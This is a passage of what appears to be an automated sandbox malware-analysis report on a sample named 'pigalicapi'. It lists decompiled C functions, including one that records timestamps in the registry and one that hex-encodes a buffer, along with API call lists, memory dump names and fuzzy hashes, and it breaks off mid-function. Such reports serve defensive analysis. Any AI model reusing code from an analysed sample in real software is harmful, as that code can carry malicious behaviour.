                                                                                                                                                                                                                                                                                                        0x024e72c6
                                                                                                                                                                                                                                                                                                        0x024e72d6
                                                                                                                                                                                                                                                                                                        0x024e72d8
                                                                                                                                                                                                                                                                                                        0x024e72d8
                                                                                                                                                                                                                                                                                                        0x024e72df
                                                                                                                                                                                                                                                                                                        0x024e7301
                                                                                                                                                                                                                                                                                                        0x024e7307
                                                                                                                                                                                                                                                                                                        0x024e730e
                                                                                                                                                                                                                                                                                                        0x024e7331
                                                                                                                                                                                                                                                                                                        0x024e733c
                                                                                                                                                                                                                                                                                                        0x024e7343
                                                                                                                                                                                                                                                                                                        0x024e7349
                                                                                                                                                                                                                                                                                                        0x024e734c
                                                                                                                                                                                                                                                                                                        0x024e734f
                                                                                                                                                                                                                                                                                                        0x024e7353
                                                                                                                                                                                                                                                                                                        0x024e7358
                                                                                                                                                                                                                                                                                                        0x024e735e
                                                                                                                                                                                                                                                                                                        0x024e7364
                                                                                                                                                                                                                                                                                                        0x024e736a
                                                                                                                                                                                                                                                                                                        0x024e736f
                                                                                                                                                                                                                                                                                                        0x024e7374
                                                                                                                                                                                                                                                                                                        0x024e737a
                                                                                                                                                                                                                                                                                                        0x024e7380
                                                                                                                                                                                                                                                                                                        0x024e7383
                                                                                                                                                                                                                                                                                                        0x024e738b
                                                                                                                                                                                                                                                                                                        0x024e7393
                                                                                                                                                                                                                                                                                                        0x024e739f
                                                                                                                                                                                                                                                                                                        0x024e73a1
                                                                                                                                                                                                                                                                                                        0x024e73a1
                                                                                                                                                                                                                                                                                                        0x024e739f
                                                                                                                                                                                                                                                                                                        0x024e73a9
                                                                                                                                                                                                                                                                                                        0x024e73a9
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e7301

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • wsprintfA.USER32 ref: 024E72BD
                                                                                                                                                                                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,000F003F,00000000), ref: 024E72F9
                                                                                                                                                                                                                                                                                                        • RegQueryValueExA.ADVAPI32(00000000,?,00000000,00000000,?,00000010), ref: 024E7329
                                                                                                                                                                                                                                                                                                        • GetLocalTime.KERNEL32(?), ref: 024E7343
                                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 024E73A9
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CloseLocalOpenQueryTimeValuewsprintf
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3852505512-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 81820a8aeddebea06b9867b2c9c0b0d6b51a3446fdd2c1e1d8d5dd4756d99e6b
                                                                                                                                                                                                                                                                                                        • Instruction ID: 7d06f40cc225e53b3b4b26b2beee061e5ed6bd387d80a8081886905dbecdfbdb
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 81820a8aeddebea06b9867b2c9c0b0d6b51a3446fdd2c1e1d8d5dd4756d99e6b
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 90415BB4A40208DFEF08DF94D485BAEBBB5BF48301F14865EE915AB381D7759944CF90
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • TlsSetValue.KERNEL32 ref: 00410CEE
                                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00410CF7
                                                                                                                                                                                                                                                                                                        • _setjmp3.MSVCRT ref: 00410D1F
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32 ref: 00410D97
                                                                                                                                                                                                                                                                                                        • _endthreadex.MSVCRT(00000000,00000000), ref: 00410E04
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00410280: fprintf.MSVCRT ref: 004102C0
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CloseCurrentHandleThreadValue_endthreadex_setjmp3fprintf
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2387900098-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: afb67a9da1f32ea5b8055769f7c37646c4bbc43da5d0144652c704a0bd7a2f59
                                                                                                                                                                                                                                                                                                        • Instruction ID: 13198fc10ca4ea6836e7e92751527e6844c2fb09f0a62ae1e1a6dff033c7f563
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: afb67a9da1f32ea5b8055769f7c37646c4bbc43da5d0144652c704a0bd7a2f59
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D941F9747047059FCB10EF66D588A9A7BF4AF04344F45886DE8889B312D778E9C1CB9A
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                        			E024E73C0(long _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                                                        				char* _v8;
                                                                                                                                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v20;
                                                                                                                                                                                                                                                                                                        				char _v36;
                                                                                                                                                                                                                                                                                                        				char _v52;
                                                                                                                                                                                                                                                                                                        				long _t24;
                                                                                                                                                                                                                                                                                                        				char* _t26;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				if(_a4 != 0 && _a8 != 0 && _a12 != 0) {
                                                                                                                                                                                                                                                                                                        					_t24 = _a4;
                                                                                                                                                                                                                                                                                                        					if( *((intOrPtr*)(_t24 + 0x10)) != 0) {
                                                                                                                                                                                                                                                                                                        						_v20 = E024E16F0(_a8, _a12);
                                                                                                                                                                                                                                                                                                        						_t26 =  *0x24f18a0; // 0x24f3b88
                                                                                                                                                                                                                                                                                                        						_v8 = _t26;
                                                                                                                                                                                                                                                                                                        						E024E7D20(_t26,  &_v36, 0, 0x10);
                                                                                                                                                                                                                                                                                                        						wsprintfA( &_v36, "%u", _v20);
                                                                                                                                                                                                                                                                                                        						_v12 = 0x80000001;
                                                                                                                                                                                                                                                                                                        						if(( *0x24f435a & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                                        							_v12 = 0x80000002;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						_v16 = 0;
                                                                                                                                                                                                                                                                                                        						_t24 = RegOpenKeyExA(_v12, _v8, 0, 0xf003f,  &_v16);
                                                                                                                                                                                                                                                                                                        						if(_t24 == 0) {
                                                                                                                                                                                                                                                                                                        							GetLocalTime( &_v52);
                                                                                                                                                                                                                                                                                                        							RegSetValueExA(_v16,  &_v36, 0, 3,  &_v52, 0x10);
                                                                                                                                                                                                                                                                                                        							return RegCloseKey(_v16);
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				return _t24;
                                                                                                                                                                                                                                                                                                        			}











                                                                                                                                                                                                                                                                                                        0x024e73ca
                                                                                                                                                                                                                                                                                                        0x024e73e4
                                                                                                                                                                                                                                                                                                        0x024e73eb
                                                                                                                                                                                                                                                                                                        0x024e7401
                                                                                                                                                                                                                                                                                                        0x024e7404
                                                                                                                                                                                                                                                                                                        0x024e7409
                                                                                                                                                                                                                                                                                                        0x024e7414
                                                                                                                                                                                                                                                                                                        0x024e7429
                                                                                                                                                                                                                                                                                                        0x024e7432
                                                                                                                                                                                                                                                                                                        0x024e7442
                                                                                                                                                                                                                                                                                                        0x024e7444
                                                                                                                                                                                                                                                                                                        0x024e7444
                                                                                                                                                                                                                                                                                                        0x024e744b
                                                                                                                                                                                                                                                                                                        0x024e7465
                                                                                                                                                                                                                                                                                                        0x024e746d
                                                                                                                                                                                                                                                                                                        0x024e7473
                                                                                                                                                                                                                                                                                                        0x024e748b
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e7495
                                                                                                                                                                                                                                                                                                        0x024e746d
                                                                                                                                                                                                                                                                                                        0x024e73eb
                                                                                                                                                                                                                                                                                                        0x024e749e

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • wsprintfA.USER32 ref: 024E7429
                                                                                                                                                                                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,000F003F,00000000), ref: 024E7465
                                                                                                                                                                                                                                                                                                        • GetLocalTime.KERNEL32(?), ref: 024E7473
                                                                                                                                                                                                                                                                                                        • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000003,?,00000010), ref: 024E748B
                                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 024E7495
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CloseLocalOpenTimeValuewsprintf
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3926099652-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: d8534e6eb5cc7fff0b6601eb1e473bf811b82b4f0ca3e298a246cee83af307fd
                                                                                                                                                                                                                                                                                                        • Instruction ID: a76e5e689cddf47266a2a3cb71896f0a8fd01422a61496d92d3a095c5f0a957e
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d8534e6eb5cc7fff0b6601eb1e473bf811b82b4f0ca3e298a246cee83af307fd
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 65216B75D40208ABEF04CFA4D888FAEBB78BF48705F048949FA059A281D7B49610CB50
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                        			E024E9650(intOrPtr _a4, intOrPtr _a8, CHAR* _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                                                                        				int _v8;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v12;
                                                                                                                                                                                                                                                                                                        				char _v20;
                                                                                                                                                                                                                                                                                                        				int _v24;
                                                                                                                                                                                                                                                                                                        				signed char _v25;
                                                                                                                                                                                                                                                                                                        				void* _t58;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                                                                                                                                                        				if(_a4 != 0 && _a8 != 0 && _a12 != 0 && _a16 != 0) {
                                                                                                                                                                                                                                                                                                        					_v12 = 0;
                                                                                                                                                                                                                                                                                                        					_v24 = lstrlenA(_a12);
                                                                                                                                                                                                                                                                                                        					while(_v12 < _a8 && _v24 < _a16) {
                                                                                                                                                                                                                                                                                                        						_v25 =  *((intOrPtr*)(_a4 + _v12));
                                                                                                                                                                                                                                                                                                        						E024E7D20(_a4 + _v12,  &_v20, 0, 8);
                                                                                                                                                                                                                                                                                                        						E024E9560(_v25 & 0x000000ff,  &_v20, 7);
                                                                                                                                                                                                                                                                                                        						_t58 = _t58 + 0x18;
                                                                                                                                                                                                                                                                                                        						lstrcatA(_a12,  &_v20);
                                                                                                                                                                                                                                                                                                        						_v24 = lstrlenA(_a12);
                                                                                                                                                                                                                                                                                                        						_v12 = _v12 + 1;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					if(lstrlenA(_a12) > _a16) {
                                                                                                                                                                                                                                                                                                        						_a12[_a16] = 0;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					_v8 = lstrlenA(_a12);
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				return _v8;
                                                                                                                                                                                                                                                                                                        			}









                                                                                                                                                                                                                                                                                                        0x024e9656
                                                                                                                                                                                                                                                                                                        0x024e9661
                                                                                                                                                                                                                                                                                                        0x024e9685
                                                                                                                                                                                                                                                                                                        0x024e9696
                                                                                                                                                                                                                                                                                                        0x024e9699
                                                                                                                                                                                                                                                                                                        0x024e96b1
                                                                                                                                                                                                                                                                                                        0x024e96bc
                                                                                                                                                                                                                                                                                                        0x024e96cf
                                                                                                                                                                                                                                                                                                        0x024e96d4
                                                                                                                                                                                                                                                                                                        0x024e96df
                                                                                                                                                                                                                                                                                                        0x024e96ef
                                                                                                                                                                                                                                                                                                        0x024e96f8
                                                                                                                                                                                                                                                                                                        0x024e96f8
                                                                                                                                                                                                                                                                                                        0x024e970a
                                                                                                                                                                                                                                                                                                        0x024e9712
                                                                                                                                                                                                                                                                                                        0x024e9712
                                                                                                                                                                                                                                                                                                        0x024e971f
                                                                                                                                                                                                                                                                                                        0x024e971f
                                                                                                                                                                                                                                                                                                        0x024e9728

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • lstrlenA.KERNEL32(00000000), ref: 024E9690
                                                                                                                                                                                                                                                                                                        • lstrcatA.KERNEL32(00000000,00000000), ref: 024E96DF
                                                                                                                                                                                                                                                                                                        • lstrlenA.KERNEL32(00000000), ref: 024E96E9
                                                                                                                                                                                                                                                                                                        • lstrlenA.KERNEL32(00000000), ref: 024E9701
                                                                                                                                                                                                                                                                                                        • lstrlenA.KERNEL32(00000000), ref: 024E9719
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: lstrlen$lstrcat
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 493641738-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 5110b091d19af6d3d200401d4df2741a6251172f42651b92de77bef5c2aec830
                                                                                                                                                                                                                                                                                                        • Instruction ID: cb04ab1e6b9d95b01a4b97ecdc7c487bce646bf604fb00dd91d294b557c14562
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5110b091d19af6d3d200401d4df2741a6251172f42651b92de77bef5c2aec830
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 56212AB0900349EFEF18CFA4D885BAE7BB5BF44305F14894AE915A7381D374AA54CF91
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetSystemTimeAsFileTime.KERNEL32 ref: 0040D488
                                                                                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 0040D499
                                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0040D4A1
                                                                                                                                                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 0040D4AA
                                                                                                                                                                                                                                                                                                        • QueryPerformanceCounter.KERNEL32 ref: 0040D4B9
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1445889803-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: d5a97a9b8559dd39cafb010e2e76c8d29c3b64d6af4c216edf4aba10e025f6e2
                                                                                                                                                                                                                                                                                                        • Instruction ID: f7418f5e27814e582490d40679fb3d8e681102d975b17fa56a29dd6ac314bc8c
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d5a97a9b8559dd39cafb010e2e76c8d29c3b64d6af4c216edf4aba10e025f6e2
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1711B27AD002188BCB109FB9E9885DEFBB4FB4C364F854536D805B7210DB3569198B99
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 34%
                                                                                                                                                                                                                                                                                                        			E00416290(void* __ecx, void* __edx, char _a4, intOrPtr _a8, signed int _a12) {
                                                                                                                                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v32;
                                                                                                                                                                                                                                                                                                        				char _v36;
                                                                                                                                                                                                                                                                                                        				signed int _v48;
                                                                                                                                                                                                                                                                                                        				signed int _v52;
                                                                                                                                                                                                                                                                                                        				signed int _v64;
                                                                                                                                                                                                                                                                                                        				signed int _v68;
                                                                                                                                                                                                                                                                                                        				signed int _v72;
                                                                                                                                                                                                                                                                                                        				signed int _v80;
                                                                                                                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                                                                                                                        				void* __ebp;
                                                                                                                                                                                                                                                                                                        				signed int _t46;
                                                                                                                                                                                                                                                                                                        				signed int _t47;
                                                                                                                                                                                                                                                                                                        				signed int _t48;
                                                                                                                                                                                                                                                                                                        				signed int _t51;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t53;
                                                                                                                                                                                                                                                                                                        				signed int _t55;
                                                                                                                                                                                                                                                                                                        				signed int _t56;
                                                                                                                                                                                                                                                                                                        				signed int _t59;
                                                                                                                                                                                                                                                                                                        				signed int _t61;
                                                                                                                                                                                                                                                                                                        				signed int _t62;
                                                                                                                                                                                                                                                                                                        				signed int _t64;
                                                                                                                                                                                                                                                                                                        				signed int _t65;
                                                                                                                                                                                                                                                                                                        				signed int _t67;
                                                                                                                                                                                                                                                                                                        				signed int _t72;
                                                                                                                                                                                                                                                                                                        				signed int _t73;
                                                                                                                                                                                                                                                                                                        				signed int _t74;
                                                                                                                                                                                                                                                                                                        				signed int _t75;
                                                                                                                                                                                                                                                                                                        				signed int _t76;
                                                                                                                                                                                                                                                                                                        				void* _t78;
                                                                                                                                                                                                                                                                                                        				signed int _t79;
                                                                                                                                                                                                                                                                                                        				signed int _t80;
                                                                                                                                                                                                                                                                                                        				void* _t82;
                                                                                                                                                                                                                                                                                                        				signed int _t83;
                                                                                                                                                                                                                                                                                                        				void* _t85;
                                                                                                                                                                                                                                                                                                        				signed int _t86;
                                                                                                                                                                                                                                                                                                        				char _t87;
                                                                                                                                                                                                                                                                                                        				void* _t88;
                                                                                                                                                                                                                                                                                                        				void* _t89;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t90;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t91;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t99;
                                                                                                                                                                                                                                                                                                        				void* _t103;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_t82 = __edx;
                                                                                                                                                                                                                                                                                                        				_t78 = __ecx;
                                                                                                                                                                                                                                                                                                        				_t90 = _t89 - 0x3c;
                                                                                                                                                                                                                                                                                                        				_t87 = _a4;
                                                                                                                                                                                                                                                                                                        				_t101 = _a8 - 1;
                                                                                                                                                                                                                                                                                                        				_t75 = _a12;
                                                                                                                                                                                                                                                                                                        				if(_a8 == 1) {
                                                                                                                                                                                                                                                                                                        					_v72 = _t75;
                                                                                                                                                                                                                                                                                                        					 *_t90 = _t87;
                                                                                                                                                                                                                                                                                                        					_v48 = WaitForSingleObject;
                                                                                                                                                                                                                                                                                                        					_t46 = WaitForSingleObject(??, ??);
                                                                                                                                                                                                                                                                                                        					_t91 = _t90 - 8;
                                                                                                                                                                                                                                                                                                        					__eflags = WaitForSingleObject - 0x80;
                                                                                                                                                                                                                                                                                                        					if(WaitForSingleObject == 0x80) {
                                                                                                                                                                                                                                                                                                        						_t76 = 1;
                                                                                                                                                                                                                                                                                                        						goto L19;
                                                                                                                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                                                                                                                        						__eflags = WaitForSingleObject - 0x102;
                                                                                                                                                                                                                                                                                                        						if(WaitForSingleObject == 0x102) {
                                                                                                                                                                                                                                                                                                        							_t76 = 0x8a;
                                                                                                                                                                                                                                                                                                        							goto L19;
                                                                                                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                                                                                                        							__eflags = WaitForSingleObject - 1;
                                                                                                                                                                                                                                                                                                        							asm("sbb eax, eax");
                                                                                                                                                                                                                                                                                                        							_t51 =  !_t46 & 0x00000016;
                                                                                                                                                                                                                                                                                                        							__eflags = WaitForSingleObject;
                                                                                                                                                                                                                                                                                                        							goto L15;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                                                                                                        					_v36 = _t87;
                                                                                                                                                                                                                                                                                                        					 *_t90 = E00411DD0();
                                                                                                                                                                                                                                                                                                        					_t53 = E00411DF0(_t101);
                                                                                                                                                                                                                                                                                                        					_v32 = _t53;
                                                                                                                                                                                                                                                                                                        					if(_t53 == 0) {
                                                                                                                                                                                                                                                                                                        						__eflags = _t75 - 0xffffffff;
                                                                                                                                                                                                                                                                                                        						if(_t75 == 0xffffffff) {
                                                                                                                                                                                                                                                                                                        							_v48 = WaitForSingleObject;
                                                                                                                                                                                                                                                                                                        							while(1) {
                                                                                                                                                                                                                                                                                                        								_v72 = 0x28;
                                                                                                                                                                                                                                                                                                        								 *_t90 = _t87;
                                                                                                                                                                                                                                                                                                        								_t55 = _v48();
                                                                                                                                                                                                                                                                                                        								_t91 = _t90 - 8;
                                                                                                                                                                                                                                                                                                        								__eflags = _t55 - 0x80;
                                                                                                                                                                                                                                                                                                        								_t83 = _t55;
                                                                                                                                                                                                                                                                                                        								if(_t55 == 0x80) {
                                                                                                                                                                                                                                                                                                        									break;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        								__eflags = _t55 - 0x102;
                                                                                                                                                                                                                                                                                                        								if(_t55 == 0x102) {
                                                                                                                                                                                                                                                                                                        									_t59 = E00412070(_t75, _t78, _t83, _t85, _t87, _t88);
                                                                                                                                                                                                                                                                                                        									__eflags = _t59;
                                                                                                                                                                                                                                                                                                        									if(_t59 == 0) {
                                                                                                                                                                                                                                                                                                        										continue;
                                                                                                                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                                                                                                                        										goto L49;
                                                                                                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                                                                                                                        									_t51 = 0;
                                                                                                                                                                                                                                                                                                        									__eflags = _t83;
                                                                                                                                                                                                                                                                                                        									_t76 = 0x16;
                                                                                                                                                                                                                                                                                                        									if(_t83 == 0) {
                                                                                                                                                                                                                                                                                                        										goto L15;
                                                                                                                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                                                                                                                        										L55:
                                                                                                                                                                                                                                                                                                        										_t56 = E00412070(_t76, _t78, _t83, _t85, _t87, _t88);
                                                                                                                                                                                                                                                                                                        										__eflags = _t56;
                                                                                                                                                                                                                                                                                                        										if(_t56 != 0) {
                                                                                                                                                                                                                                                                                                        											L49:
                                                                                                                                                                                                                                                                                                        											__eflags = _a8 - 2;
                                                                                                                                                                                                                                                                                                        											if(_a8 == 2) {
                                                                                                                                                                                                                                                                                                        												goto L17;
                                                                                                                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                                                                                                                        												goto L50;
                                                                                                                                                                                                                                                                                                        											}
                                                                                                                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                                                                                                                        											__eflags = _t76 - 0x16;
                                                                                                                                                                                                                                                                                                        											_t51 = 0x16;
                                                                                                                                                                                                                                                                                                        											if(_t76 != 0x16) {
                                                                                                                                                                                                                                                                                                        												L19:
                                                                                                                                                                                                                                                                                                        												_v80 = 0;
                                                                                                                                                                                                                                                                                                        												 *_t91 = _t87;
                                                                                                                                                                                                                                                                                                        												_t47 = _v48();
                                                                                                                                                                                                                                                                                                        												__eflags = _t47;
                                                                                                                                                                                                                                                                                                        												if(_t47 != 0) {
                                                                                                                                                                                                                                                                                                        													goto L10;
                                                                                                                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                                                                                                                        													goto L20;
                                                                                                                                                                                                                                                                                                        												}
                                                                                                                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                                                                                                                        												goto L15;
                                                                                                                                                                                                                                                                                                        											}
                                                                                                                                                                                                                                                                                                        										}
                                                                                                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                                                                                                        								}
